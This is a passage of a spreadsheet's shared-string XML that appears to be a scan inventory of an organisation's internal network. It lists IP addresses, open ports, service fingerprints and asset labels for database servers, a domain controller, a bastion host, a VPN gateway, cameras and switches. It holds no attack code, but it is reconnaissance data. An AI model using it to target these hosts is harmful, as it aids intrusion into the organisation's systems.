msrpc(49664,49665,135,49675,49666,49668,49667,47546,49672,49669)
netbios-ssn(139)
vmware-auth(902,912)
discard(9)
microsoft-ds(445)
chargen(19)</t>
  </si>
  <si>
    <t>192.168.100.53</t>
  </si>
  <si>
    <t>备用应用服务器1</t>
  </si>
  <si>
    <t>192.168.22.60</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
dec-notes(3333)
http(8070,8119,8085,47001,19080,8020,80,10082,8017,8099,4487)
tcpwrapped(81)
ftp(21,10083)
ormi(5520)
914c-g(211)
msrpc(49154,49155,49294,49153,49304,135,49152)
anet(212)
oracle-tns(1521)
ssl(1158,3938)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
Oracle Containers for J2EE 10g
indy
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>192.168.33.10</t>
  </si>
  <si>
    <t>https(5001)
cleverdetect(6690)
grpc(3265)
iscsi(3261,3260,3263,3264)
upnp(50001)
netbios-ssn(445,139)
ssl(443)
http(50002,5000,5357,80)</t>
  </si>
  <si>
    <t>Synology-network attached storage,Lighttpd,UPnP/1.0,-Portable-SDK-for-UPnP-devices</t>
  </si>
  <si>
    <t>osm应用发布服务器</t>
  </si>
  <si>
    <t>192.168.22.30</t>
  </si>
  <si>
    <t>3624108230</t>
  </si>
  <si>
    <t>ldap(389,3268)
kpasswd5(464)
ms-wbt-server(3389)
ncacn_http(593,49669)
http(5985,80,47001)
kerberos-sec(88)
domain(53)
msrpc(60657,49758,49664,49671,49665,49670,49736,49673,135,49666,5504,49668,49680,60656,49679)
netbios-ssn(139)
tcpwrapped(3269,636)
microsoft-ds(445)
ssl(443)
mc-nmf(9389)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
Microsoft IIS httpd 10.0
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>天津漏扫工具TSS</t>
  </si>
  <si>
    <t>192.168.22.5</t>
  </si>
  <si>
    <t>天津ssl vpn</t>
  </si>
  <si>
    <t>192.168.22.4</t>
  </si>
  <si>
    <t>VPN</t>
  </si>
  <si>
    <t>Sangfor-SSL VPN client(Archive)</t>
  </si>
  <si>
    <t>221.238.2.150</t>
  </si>
  <si>
    <t>192.168.16.27</t>
  </si>
  <si>
    <t>应用备用服务器</t>
  </si>
  <si>
    <t>192.168.22.55</t>
  </si>
  <si>
    <t>1344064591</t>
  </si>
  <si>
    <t>ftp(22)
ms-wbt-server(3389)
dec-notes(3333)
914c-g(211)
netbios-ssn(139)
msrpc(49684,49664,49665,49670,64577,135,49675,49667)
microsoft-ds(445)
tcpwrapped(10050)
anet(212)
mcs-calypsoicf(3330)
raxa-mgmt(6099)
http(8003,8040,9994,9190,39,8999,6000,5985,80,9996,47001,9992,8017,9991,9995,9993)</t>
  </si>
  <si>
    <t>nginx
Microsoft-HTTPAPI 2.0
Oryx(Microsoft IIS httpd)
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>Bootstrap(jQuery)(ASP.NET-MVC)
Spring-Framework
jQuery(ASP.NET-MVC)(Bootstrap)
ASP.NET-MVC(jQuery)(Bootstrap)</t>
  </si>
  <si>
    <t>192.168.16.34</t>
  </si>
  <si>
    <t>192.168.16.25</t>
  </si>
  <si>
    <t>192.168.32.216</t>
  </si>
  <si>
    <t>mevent(7900)
msrpc(49668,47546,49667,49664,135,49666,49677,49665)
unknown(5040,62974,9128)
netbios-ssn(139)
nsjtp-data(1688)
microsoft-ds(445)
x11(6000)
msdtc(7800)</t>
  </si>
  <si>
    <t>天津堡垒机</t>
  </si>
  <si>
    <t>192.168.22.23</t>
  </si>
  <si>
    <t>ssl(443)
ms-wbt-server(12025)
ssh(12024)
unknown(12020)</t>
  </si>
  <si>
    <t>天津测试中间层服务器</t>
  </si>
  <si>
    <t>192.168.22.82</t>
  </si>
  <si>
    <t>2603926568</t>
  </si>
  <si>
    <t>http(8003,8040,9994,9190,39,6000,5985,8999,80,9996,47001,9992,8017,9991,9995,9993)
ms-wbt-server(3389)
dec-notes(3333)
914c-g(211)
netbios-ssn(139)
tcpwrapped(10050,22)
microsoft-ds(445)
anet(212)
mcs-calypsoicf(3330)
msrpc(54669,49664,49816,49665,49777,49669,135,49668)</t>
  </si>
  <si>
    <t>nginx
Microsoft-HTTPAPI 2.0
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>Bootstrap(jQuery)(ASP.NET-MVC)
Spring-Framework
ASP.NET-MVC(jQuery)(Bootstrap)</t>
  </si>
  <si>
    <t>192.168.16.31</t>
  </si>
  <si>
    <t>192.168.16.64</t>
  </si>
  <si>
    <t>freeciv(5555)
unknown(14035)</t>
  </si>
  <si>
    <t>192.168.16.53</t>
  </si>
  <si>
    <t>192.168.100.136</t>
  </si>
  <si>
    <t>192.168.16.29</t>
  </si>
  <si>
    <t>192.168.16.32</t>
  </si>
  <si>
    <t>192.168.16.22</t>
  </si>
  <si>
    <t>192.168.16.61</t>
  </si>
  <si>
    <t>192.168.16.150</t>
  </si>
  <si>
    <t>unknown(17421)
microsoft-ds(445)
netbios-ssn(139)
msrpc(49152,49153,49255,49693,135,49154,49689)</t>
  </si>
  <si>
    <t>192.168.17.4</t>
  </si>
  <si>
    <t>microsoft-ds(445)
msrpc(49155,49152,49153,49171,49158,135,49154)
netbios-ssn(139)</t>
  </si>
  <si>
    <t>192.168.16.30</t>
  </si>
  <si>
    <t>192.168.32.95</t>
  </si>
  <si>
    <t>microsoft-ds(445)
pando-pub(7680)
msrpc(49670,135)
unknown(56430)</t>
  </si>
  <si>
    <t>192.168.16.24</t>
  </si>
  <si>
    <t>192.168.16.21</t>
  </si>
  <si>
    <t>192.168.16.28</t>
  </si>
  <si>
    <t>192.168.16.52</t>
  </si>
  <si>
    <t>老物理数据库服务器2</t>
  </si>
  <si>
    <t>192.168.22.64</t>
  </si>
  <si>
    <t>1750778916</t>
  </si>
  <si>
    <t>status(26660)
ssh(22)
zabbix-agent(10050)
rpcbind(111)
raxa-mgmt(6099)
oracle-tns(13977,1521)</t>
  </si>
  <si>
    <t>数据库服务器</t>
  </si>
  <si>
    <t>192.168.22.62</t>
  </si>
  <si>
    <t>192.168.17.10</t>
  </si>
  <si>
    <t>老物理数据库服务器1</t>
  </si>
  <si>
    <t>192.168.22.63</t>
  </si>
  <si>
    <t>1047944938</t>
  </si>
  <si>
    <t>ssh(22)
rpcbind(111)
zabbix-agent(10050)
status(38883)
oracle-tns(1521,60934)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>天津数据库还原测试服务器</t>
  </si>
  <si>
    <t>192.168.22.65</t>
  </si>
  <si>
    <t>天津wifi路由器</t>
  </si>
  <si>
    <t>192.168.22.111</t>
  </si>
  <si>
    <t>天津数据库历史库</t>
  </si>
  <si>
    <t>192.168.22.80</t>
  </si>
  <si>
    <t>3919160192</t>
  </si>
  <si>
    <t>rpcbind(111)
tcpwrapped(10050)
ssh(22)
status(19028)
oracle-tns(64276,1521)</t>
  </si>
  <si>
    <t>192.168.100.169</t>
  </si>
  <si>
    <t>192.168.21.160</t>
  </si>
  <si>
    <t>192.168.20.226</t>
  </si>
  <si>
    <t>192.168.21.150</t>
  </si>
  <si>
    <t>192.168.20.191</t>
  </si>
  <si>
    <t>192.168.21.15</t>
  </si>
  <si>
    <t>192.168.21.144</t>
  </si>
  <si>
    <t>192.168.20.165</t>
  </si>
  <si>
    <t>192.168.20.17</t>
  </si>
  <si>
    <t>hikvision-camera,UPnP/1.0,-Portable-SDK-for-UPnP-devices,Hikvision-IP CAMERA(Hikvision-NVR)</t>
  </si>
  <si>
    <t>192.168.20.21</t>
  </si>
  <si>
    <t>192.168.20.202</t>
  </si>
  <si>
    <t>192.168.100.188</t>
  </si>
  <si>
    <t>192.168.18.105</t>
  </si>
  <si>
    <t>192.168.20.84</t>
  </si>
  <si>
    <t>rrac(5678)
unknown(15678,14035)</t>
  </si>
  <si>
    <t>192.168.100.75</t>
  </si>
  <si>
    <t>192.168.100.30</t>
  </si>
  <si>
    <t>192.168.21.195</t>
  </si>
  <si>
    <t>soap(8899)
http-alt(8000)
rtsp(554)
dhanalakshmi(34567)
http(80)
unknown(9530,34561)</t>
  </si>
  <si>
    <t>192.168.15.2</t>
  </si>
  <si>
    <t>http(80)
ssl(8443,443)
kz-migr(8102)
hikvision-control(8000)
rtsp(554)</t>
  </si>
  <si>
    <t>Hikvision-IP CAMERA</t>
  </si>
  <si>
    <t>192.168.22.15</t>
  </si>
  <si>
    <t>192.168.21.224</t>
  </si>
  <si>
    <t>192.168.21.220</t>
  </si>
  <si>
    <t>192.168.17.253</t>
  </si>
  <si>
    <t>pando-pub(7680)
ms-wbt-server(3389)
http(5357)
unknown(56504,5040)
netbios-ssn(139)
microsoft-ds(445)
msrpc(49665,49667,49670,135,49666,49664,49677,49668,49672)
eapol-relay(10253)</t>
  </si>
  <si>
    <t>192.168.13.209</t>
  </si>
  <si>
    <t>192.168.13.217</t>
  </si>
  <si>
    <t>192.168.13.200</t>
  </si>
  <si>
    <t>192.168.21.7</t>
  </si>
  <si>
    <t>192.168.13.235</t>
  </si>
  <si>
    <t>192.168.17.92</t>
  </si>
  <si>
    <t>192.168.21.229</t>
  </si>
  <si>
    <t>192.168.19.79</t>
  </si>
  <si>
    <t>192.168.19.159</t>
  </si>
  <si>
    <t>192.168.19.168</t>
  </si>
  <si>
    <t>192.168.19.33</t>
  </si>
  <si>
    <t>192.168.19.156</t>
  </si>
  <si>
    <t>192.168.19.17</t>
  </si>
  <si>
    <t>192.168.5.1</t>
  </si>
  <si>
    <t>ssh(22)
ssl(443)
telnet(23)
http(80)
tcpwrapped(64443)</t>
  </si>
  <si>
    <t>simple(S7703)
S7703(simple)</t>
  </si>
  <si>
    <t>S7703,simple(Huawei-Switch)</t>
  </si>
  <si>
    <t>192.168.19.65</t>
  </si>
  <si>
    <t>192.168.19.219</t>
  </si>
  <si>
    <t>192.168.19.18</t>
  </si>
  <si>
    <t>192.168.23.222</t>
  </si>
  <si>
    <t>eSoft,Mongoose,DVR</t>
  </si>
  <si>
    <t>192.168.23.55</t>
  </si>
  <si>
    <t>192.168.23.124</t>
  </si>
  <si>
    <t>192.168.23.31</t>
  </si>
  <si>
    <t>192.168.23.54</t>
  </si>
  <si>
    <t>192.168.23.25</t>
  </si>
  <si>
    <t>192.168.23.109</t>
  </si>
  <si>
    <t>192.168.23.34</t>
  </si>
  <si>
    <t>192.168.23.221</t>
  </si>
  <si>
    <t>192.168.23.85</t>
  </si>
  <si>
    <t>192.168.24.134</t>
  </si>
  <si>
    <t>192.168.24.221</t>
  </si>
  <si>
    <t>192.168.100.120</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
ssh(22)
tcpwrapped(64443)</t>
  </si>
  <si>
    <t>192.168.100.146</t>
  </si>
  <si>
    <t>192.168.100.151</t>
  </si>
  <si>
    <t>192.168.100.161</t>
  </si>
  <si>
    <t>192.168.100.165</t>
  </si>
  <si>
    <t>192.168.100.153</t>
  </si>
  <si>
    <t>192.168.100.157</t>
  </si>
  <si>
    <t>192.168.100.167</t>
  </si>
  <si>
    <t>192.168.100.159</t>
  </si>
  <si>
    <t>192.168.100.122</t>
  </si>
  <si>
    <t>192.168.100.162</t>
  </si>
  <si>
    <t>192.168.100.173</t>
  </si>
  <si>
    <t>http(80)
ssl(443)</t>
  </si>
  <si>
    <t>192.168.100.154</t>
  </si>
  <si>
    <t>192.168.100.150</t>
  </si>
  <si>
    <t>ssh(22)
ssl(443)
telnet(23)
ftp(21)
http(80)</t>
  </si>
  <si>
    <t>192.168.100.152</t>
  </si>
  <si>
    <t>192.168.100.180</t>
  </si>
  <si>
    <t>192.168.100.182</t>
  </si>
  <si>
    <t>192.168.100.115</t>
  </si>
  <si>
    <t>192.168.100.111</t>
  </si>
  <si>
    <t>192.168.100.181</t>
  </si>
  <si>
    <t>192.168.100.186</t>
  </si>
  <si>
    <t>192.168.100.114</t>
  </si>
  <si>
    <t>192.168.100.184</t>
  </si>
  <si>
    <t>192.168.100.185</t>
  </si>
  <si>
    <t>192.168.100.129</t>
  </si>
  <si>
    <t>192.168.20.199</t>
  </si>
  <si>
    <t>192.168.21.126</t>
  </si>
  <si>
    <t>192.168.20.148</t>
  </si>
  <si>
    <t>192.168.21.17</t>
  </si>
  <si>
    <t>unknown(9527,9530,34599)
telnet(23)
http(80)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.20.151</t>
  </si>
  <si>
    <t>192.168.20.146</t>
  </si>
  <si>
    <t>192.168.21.165</t>
  </si>
  <si>
    <t>192.168.21.147</t>
  </si>
  <si>
    <t>192.168.20.90</t>
  </si>
  <si>
    <t>192.168.20.198</t>
  </si>
  <si>
    <t>192.168.20.228</t>
  </si>
  <si>
    <t>192.168.20.70</t>
  </si>
  <si>
    <t>192.168.20.15</t>
  </si>
  <si>
    <t>192.168.21.11</t>
  </si>
  <si>
    <t>192.168.21.155</t>
  </si>
  <si>
    <t>192.168.20.213</t>
  </si>
  <si>
    <t>192.168.21.142</t>
  </si>
  <si>
    <t>192.168.20.183</t>
  </si>
  <si>
    <t>192.168.20.181</t>
  </si>
  <si>
    <t>192.168.21.110</t>
  </si>
  <si>
    <t>192.168.20.175</t>
  </si>
  <si>
    <t>192.168.20.153</t>
  </si>
  <si>
    <t>192.168.21.169</t>
  </si>
  <si>
    <t>192.168.20.80</t>
  </si>
  <si>
    <t>192.168.21.182</t>
  </si>
  <si>
    <t>192.168.20.163</t>
  </si>
  <si>
    <t>192.168.21.180</t>
  </si>
  <si>
    <t>192.168.21.170</t>
  </si>
  <si>
    <t>192.168.21.100</t>
  </si>
  <si>
    <t>192.168.21.149</t>
  </si>
  <si>
    <t>192.168.21.152</t>
  </si>
  <si>
    <t>192.168.21.16</t>
  </si>
  <si>
    <t>192.168.20.176</t>
  </si>
  <si>
    <t>192.168.20.167</t>
  </si>
  <si>
    <t>192.168.21.148</t>
  </si>
  <si>
    <t>192.168.20.144</t>
  </si>
  <si>
    <t>192.168.20.172</t>
  </si>
  <si>
    <t>192.168.21.10</t>
  </si>
  <si>
    <t>192.168.20.154</t>
  </si>
  <si>
    <t>192.168.20.71</t>
  </si>
  <si>
    <t>192.168.20.152</t>
  </si>
  <si>
    <t>192.168.20.160</t>
  </si>
  <si>
    <t>192.168.21.184</t>
  </si>
  <si>
    <t>192.168.21.156</t>
  </si>
  <si>
    <t>192.168.21.151</t>
  </si>
  <si>
    <t>192.168.21.123</t>
  </si>
  <si>
    <t>192.168.21.154</t>
  </si>
  <si>
    <t>192.168.21.111</t>
  </si>
  <si>
    <t>192.168.20.197</t>
  </si>
  <si>
    <t>192.168.21.181</t>
  </si>
  <si>
    <t>192.168.20.179</t>
  </si>
  <si>
    <t>soap(8899)
unknown(9527,34561)
rtsp(554)
dhanalakshmi(34567)
http(80)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.21.107</t>
  </si>
  <si>
    <t>192.168.21.115</t>
  </si>
  <si>
    <t>192.168.20.162</t>
  </si>
  <si>
    <t>192.168.21.163</t>
  </si>
  <si>
    <t>192.168.21.162</t>
  </si>
  <si>
    <t>192.168.20.178</t>
  </si>
  <si>
    <t>192.168.21.183</t>
  </si>
  <si>
    <t>192.168.20.234</t>
  </si>
  <si>
    <t>192.168.21.113</t>
  </si>
  <si>
    <t>192.168.20.215</t>
  </si>
  <si>
    <t>192.168.21.109</t>
  </si>
  <si>
    <t>192.168.20.157</t>
  </si>
  <si>
    <t>192.168.21.153</t>
  </si>
  <si>
    <t>192.168.20.72</t>
  </si>
  <si>
    <t>192.168.20.142</t>
  </si>
  <si>
    <t>192.168.21.159</t>
  </si>
  <si>
    <t>192.168.20.187</t>
  </si>
  <si>
    <t>192.168.20.240</t>
  </si>
  <si>
    <t>192.168.21.135</t>
  </si>
  <si>
    <t>192.168.21.106</t>
  </si>
  <si>
    <t>192.168.21.189</t>
  </si>
  <si>
    <t>192.168.20.155</t>
  </si>
  <si>
    <t>192.168.20.159</t>
  </si>
  <si>
    <t>192.168.20.164</t>
  </si>
  <si>
    <t>192.168.21.105</t>
  </si>
  <si>
    <t>192.168.20.186</t>
  </si>
  <si>
    <t>192.168.20.182</t>
  </si>
  <si>
    <t>192.168.21.166</t>
  </si>
  <si>
    <t>192.168.20.224</t>
  </si>
  <si>
    <t>192.168.20.192</t>
  </si>
  <si>
    <t>192.168.21.145</t>
  </si>
  <si>
    <t>192.168.20.143</t>
  </si>
  <si>
    <t>192.168.21.104</t>
  </si>
  <si>
    <t>192.168.21.146</t>
  </si>
  <si>
    <t>192.168.20.168</t>
  </si>
  <si>
    <t>192.168.20.50</t>
  </si>
  <si>
    <t>radan-http(8088)
ssl(443)
unknown(37777)
http(80)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.20.82</t>
  </si>
  <si>
    <t>192.168.21.140</t>
  </si>
  <si>
    <t>192.168.21.157</t>
  </si>
  <si>
    <t>192.168.20.83</t>
  </si>
  <si>
    <t>192.168.21.164</t>
  </si>
  <si>
    <t>192.168.21.116</t>
  </si>
  <si>
    <t>192.168.20.141</t>
  </si>
  <si>
    <t>192.168.20.158</t>
  </si>
  <si>
    <t>192.168.21.103</t>
  </si>
  <si>
    <t>192.168.20.101</t>
  </si>
  <si>
    <t>unknown(37777)
rtsp(554)
http(80)
radan-http(8088)
rtmp(1935)
upnp(5000)</t>
  </si>
  <si>
    <t>192.168.21.171</t>
  </si>
  <si>
    <t>192.168.21.172</t>
  </si>
  <si>
    <t>192.168.20.189</t>
  </si>
  <si>
    <t>192.168.21.161</t>
  </si>
  <si>
    <t>192.168.21.108</t>
  </si>
  <si>
    <t>192.168.21.185</t>
  </si>
  <si>
    <t>192.168.21.139</t>
  </si>
  <si>
    <t>192.168.20.145</t>
  </si>
  <si>
    <t>192.168.20.188</t>
  </si>
  <si>
    <t>192.168.21.167</t>
  </si>
  <si>
    <t>192.168.20.161</t>
  </si>
  <si>
    <t>192.168.21.114</t>
  </si>
  <si>
    <t>192.168.21.136</t>
  </si>
  <si>
    <t>192.168.21.158</t>
  </si>
  <si>
    <t>192.168.21.124</t>
  </si>
  <si>
    <t>192.168.21.117</t>
  </si>
  <si>
    <t>192.168.21.141</t>
  </si>
  <si>
    <t>192.168.21.101</t>
  </si>
  <si>
    <t>192.168.20.170</t>
  </si>
  <si>
    <t>192.168.20.196</t>
  </si>
  <si>
    <t>192.168.20.236</t>
  </si>
  <si>
    <t>192.168.20.193</t>
  </si>
  <si>
    <t>192.168.20.138</t>
  </si>
  <si>
    <t>192.168.20.139</t>
  </si>
  <si>
    <t>192.168.20.140</t>
  </si>
  <si>
    <t>192.168.18.250</t>
  </si>
  <si>
    <t>http(85,100,80,89,9998,817)
ssl(443,61111)
ssh(22345)
unknown(61182)</t>
  </si>
  <si>
    <t>homepage,Sangfor-AC</t>
  </si>
  <si>
    <t>192.168.21.1</t>
  </si>
  <si>
    <t>192.168.18.251</t>
  </si>
  <si>
    <t>ssl(443,7443)
ssh(22345)
http(80,81)</t>
  </si>
  <si>
    <t>192.168.20.1</t>
  </si>
  <si>
    <t>192.168.20.23</t>
  </si>
  <si>
    <t>192.168.100.187</t>
  </si>
  <si>
    <t>192.168.18.216</t>
  </si>
  <si>
    <t>jQuery(Polyfill)</t>
  </si>
  <si>
    <t>192.168.18.211</t>
  </si>
  <si>
    <t>http(80)
ssh(22)
iscsi(3260)
ssl(22010,443,22011,22012,22041,22001,23031,4480,23020)</t>
  </si>
  <si>
    <t>Sangfor-Enterprise Cloud Platform,Apache httpd</t>
  </si>
  <si>
    <t>192.168.18.112</t>
  </si>
  <si>
    <t>ssl(443)
ilo-console(17990)
ssh(22)
ilo-vm(17988)
tcpwrapped(80)</t>
  </si>
  <si>
    <t>192.168.20.85</t>
  </si>
  <si>
    <t>192.168.20.75</t>
  </si>
  <si>
    <t>192.168.20.93</t>
  </si>
  <si>
    <t>192.168.20.12</t>
  </si>
  <si>
    <t>192.168.18.210</t>
  </si>
  <si>
    <t>http(80)
ssl(22010,443,22011,22041,22001,23031,4480,23020)
iscsi(3260)
ssh(22)</t>
  </si>
  <si>
    <t>192.168.18.212</t>
  </si>
  <si>
    <t>ssl(443,23031,4480,23020)
ssh(22)
iscsi(3260)
http(80)</t>
  </si>
  <si>
    <t>192.168.20.10</t>
  </si>
  <si>
    <t>192.168.18.213</t>
  </si>
  <si>
    <t>192.168.20.6</t>
  </si>
  <si>
    <t>192.168.20.7</t>
  </si>
  <si>
    <t>192.168.20.14</t>
  </si>
  <si>
    <t>192.168.20.3</t>
  </si>
  <si>
    <t>Webserver,Hikvision-NVR(Hikvision-IP CAMERA)</t>
  </si>
  <si>
    <t>192.168.20.22</t>
  </si>
  <si>
    <t>192.168.20.8</t>
  </si>
  <si>
    <t>192.168.20.18</t>
  </si>
  <si>
    <t>192.168.20.185</t>
  </si>
  <si>
    <t>unknown(37777)
pwgpsi(3800)
rtsp(554)
http(80)
ssl(443)
upnp(5000)</t>
  </si>
  <si>
    <t>192.168.18.215</t>
  </si>
  <si>
    <t>192.168.18.214</t>
  </si>
  <si>
    <t>ssh(22)
commtact-http(20002)
netbios-ssn(445)
ssl(443,20001)
http(80,8000)
ice(21104,21101,21102,21113,20000,21111,20090,20100,21105,21100,21109,21107,21108)</t>
  </si>
  <si>
    <t>Meichuang-Data backup and recovery system</t>
  </si>
  <si>
    <t>nginx(Wizard)(ttas)(Next)(settings)
nginx</t>
  </si>
  <si>
    <t>Meichuang-Data backup and recovery system,Wizard(ttas)(Next)(settings)</t>
  </si>
  <si>
    <t>192.168.18.114</t>
  </si>
  <si>
    <t>192.168.20.40</t>
  </si>
  <si>
    <t>http(80)
tcpwrapped(30999,30960)
hikvision-nvr(8000)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.20.100</t>
  </si>
  <si>
    <t>sdr(9010)
rtsp(554)
tcpwrapped(30999)
hikvision-nvr(8000)
tambora(9020)
http(80,7681)</t>
  </si>
  <si>
    <t>192.168.20.60</t>
  </si>
  <si>
    <t>sdr(9010)
hikvision-control(8000)
tcpwrapped(30960)
rtsp(554)
http(80)
tambora(9020)</t>
  </si>
  <si>
    <t>192.168.18.115</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
ilo-console(17990)
ssh(22)
ilo-vm(17988)</t>
  </si>
  <si>
    <t>192.168.18.116</t>
  </si>
  <si>
    <t>Dell-Remote-Access-Controller</t>
  </si>
  <si>
    <t>Dell (China) Company Limited</t>
  </si>
  <si>
    <t>192.168.18.113</t>
  </si>
  <si>
    <t>192.168.18.1</t>
  </si>
  <si>
    <t>192.168.21.190</t>
  </si>
  <si>
    <t>192.168.100.250</t>
  </si>
  <si>
    <t>192.168.20.247</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
netbios-ssn(139)
http(6731,6730,60350)
unknown(5040)
websocket(9798)
microsoft-ds(445)
tcpwrapped(20531,41631,26831,31836,41531,30840,41731,19531,31843,30836,30842,42331)
msrpc(49667,49682,49665,135,49664,49671,49666,49669,49668)</t>
  </si>
  <si>
    <t>WebSocket++</t>
  </si>
  <si>
    <t>192.168.20.135</t>
  </si>
  <si>
    <t>192.168.20.217</t>
  </si>
  <si>
    <t>192.168.20.216</t>
  </si>
  <si>
    <t>192.168.18.252</t>
  </si>
  <si>
    <t>http(4430)
ssl(1443)</t>
  </si>
  <si>
    <t>192.168.18.104</t>
  </si>
  <si>
    <t>192.168.18.102</t>
  </si>
  <si>
    <t>192.168.100.78</t>
  </si>
  <si>
    <t>192.168.100.74</t>
  </si>
  <si>
    <t>192.168.100.35</t>
  </si>
  <si>
    <t>192.168.100.70</t>
  </si>
  <si>
    <t>192.168.100.32</t>
  </si>
  <si>
    <t>192.168.100.72</t>
  </si>
  <si>
    <t>192.168.100.38</t>
  </si>
  <si>
    <t>192.168.100.77</t>
  </si>
  <si>
    <t>192.168.100.220</t>
  </si>
  <si>
    <t>tcpwrapped(64443)</t>
  </si>
  <si>
    <t>192.168.20.92</t>
  </si>
  <si>
    <t>192.168.100.73</t>
  </si>
  <si>
    <t>192.168.100.244</t>
  </si>
  <si>
    <t>ssh(830)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.100.76</t>
  </si>
  <si>
    <t>192.168.100.242</t>
  </si>
  <si>
    <t>192.168.100.241</t>
  </si>
  <si>
    <t>192.168.20.74</t>
  </si>
  <si>
    <t>192.168.100.71</t>
  </si>
  <si>
    <t>192.168.100.37</t>
  </si>
  <si>
    <t>192.168.21.237</t>
  </si>
  <si>
    <t>192.168.21.94</t>
  </si>
  <si>
    <t>192.168.21.66</t>
  </si>
  <si>
    <t>192.168.21.42</t>
  </si>
  <si>
    <t>192.168.21.84</t>
  </si>
  <si>
    <t>192.168.21.64</t>
  </si>
  <si>
    <t>192.168.21.79</t>
  </si>
  <si>
    <t>192.168.21.72</t>
  </si>
  <si>
    <t>192.168.21.62</t>
  </si>
  <si>
    <t>192.168.21.232</t>
  </si>
  <si>
    <t>192.168.21.91</t>
  </si>
  <si>
    <t>192.168.21.77</t>
  </si>
  <si>
    <t>192.168.21.93</t>
  </si>
  <si>
    <t>unknown(10016)
jamlink(8091)
ppp(3000)
http(80)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.21.43</t>
  </si>
  <si>
    <t>192.168.21.214</t>
  </si>
  <si>
    <t>192.168.21.65</t>
  </si>
  <si>
    <t>192.168.21.90</t>
  </si>
  <si>
    <t>192.168.21.85</t>
  </si>
  <si>
    <t>192.168.21.76</t>
  </si>
  <si>
    <t>192.168.21.36</t>
  </si>
  <si>
    <t>192.168.21.216</t>
  </si>
  <si>
    <t>192.168.21.31</t>
  </si>
  <si>
    <t>192.168.21.87</t>
  </si>
  <si>
    <t>192.168.21.70</t>
  </si>
  <si>
    <t>192.168.21.49</t>
  </si>
  <si>
    <t>192.168.21.99</t>
  </si>
  <si>
    <t>192.168.21.40</t>
  </si>
  <si>
    <t>192.168.21.68</t>
  </si>
  <si>
    <t>192.168.21.20</t>
  </si>
  <si>
    <t>192.168.21.51</t>
  </si>
  <si>
    <t>192.168.21.92</t>
  </si>
  <si>
    <t>192.168.21.55</t>
  </si>
  <si>
    <t>192.168.21.235</t>
  </si>
  <si>
    <t>192.168.21.69</t>
  </si>
  <si>
    <t>192.168.21.74</t>
  </si>
  <si>
    <t>192.168.21.80</t>
  </si>
  <si>
    <t>192.168.21.196</t>
  </si>
  <si>
    <t>192.168.21.35</t>
  </si>
  <si>
    <t>192.168.21.86</t>
  </si>
  <si>
    <t>192.168.21.88</t>
  </si>
  <si>
    <t>192.168.21.198</t>
  </si>
  <si>
    <t>192.168.21.236</t>
  </si>
  <si>
    <t>192.168.21.215</t>
  </si>
  <si>
    <t>192.168.21.73</t>
  </si>
  <si>
    <t>192.168.21.71</t>
  </si>
  <si>
    <t>192.168.21.98</t>
  </si>
  <si>
    <t>192.168.21.75</t>
  </si>
  <si>
    <t>192.168.21.48</t>
  </si>
  <si>
    <t>soap(8899)
unknown(9527,34599,34561)
rtsp(554)
dhanalakshmi(34567)
http(80)
telnet(23)</t>
  </si>
  <si>
    <t>192.168.21.96</t>
  </si>
  <si>
    <t>unknown(10016)
jamlink(8091)
ppp(3000)
http(80,554)</t>
  </si>
  <si>
    <t>192.168.21.54</t>
  </si>
  <si>
    <t>192.168.21.52</t>
  </si>
  <si>
    <t>192.168.15.3</t>
  </si>
  <si>
    <t>192.168.15.9</t>
  </si>
  <si>
    <t>192.168.15.10</t>
  </si>
  <si>
    <t>192.168.21.249</t>
  </si>
  <si>
    <t>192.168.21.251</t>
  </si>
  <si>
    <t>192.168.22.41</t>
  </si>
  <si>
    <t>192.168.22.47</t>
  </si>
  <si>
    <t>天津超融合交换机</t>
  </si>
  <si>
    <t>192.168.22.28</t>
  </si>
  <si>
    <t>192.168.22.57</t>
  </si>
  <si>
    <t>192.168.22.39</t>
  </si>
  <si>
    <t>192.168.22.45</t>
  </si>
  <si>
    <t>192.168.22.42</t>
  </si>
  <si>
    <t>192.168.22.59</t>
  </si>
  <si>
    <t>192.168.22.35</t>
  </si>
  <si>
    <t>192.168.22.17</t>
  </si>
  <si>
    <t>192.168.22.16</t>
  </si>
  <si>
    <t>192.168.22.48</t>
  </si>
  <si>
    <t>192.168.22.38</t>
  </si>
  <si>
    <t>192.168.22.12</t>
  </si>
  <si>
    <t>192.168.22.18</t>
  </si>
  <si>
    <t>192.168.22.20</t>
  </si>
  <si>
    <t>192.168.22.49</t>
  </si>
  <si>
    <t>192.168.22.34</t>
  </si>
  <si>
    <t>192.168.22.29</t>
  </si>
  <si>
    <t>192.168.22.43</t>
  </si>
  <si>
    <t>192.168.22.44</t>
  </si>
  <si>
    <t>备用应用服务器2</t>
  </si>
  <si>
    <t>192.168.22.61</t>
  </si>
  <si>
    <t>192.168.22.19</t>
  </si>
  <si>
    <t>192.168.22.32</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
rtsp(554)
tcpwrapped(8443)
hikvision-nvr(8000)</t>
  </si>
  <si>
    <t>192.168.22.58</t>
  </si>
  <si>
    <t>192.168.22.14</t>
  </si>
  <si>
    <t>192.168.15.5</t>
  </si>
  <si>
    <t>192.168.15.6</t>
  </si>
  <si>
    <t>192.168.22.202</t>
  </si>
  <si>
    <t>tcpwrapped(30999,30960)
rtsp(554)
hikvision-nvr(8000)
unknown(7681)
ssl(8443,443)
http(80,6011,6120)</t>
  </si>
  <si>
    <t>hikvision-camera,Hikvision-NVR(Hikvision-IP CAMERA)</t>
  </si>
  <si>
    <t>192.168.13.1</t>
  </si>
  <si>
    <t>192.168.19.1</t>
  </si>
  <si>
    <t>192.168.15.100</t>
  </si>
  <si>
    <t>http(7681,80)
rtsp(554)
tcpwrapped(30960)
ssl(8443,443)
hikvision-nvr(8000)</t>
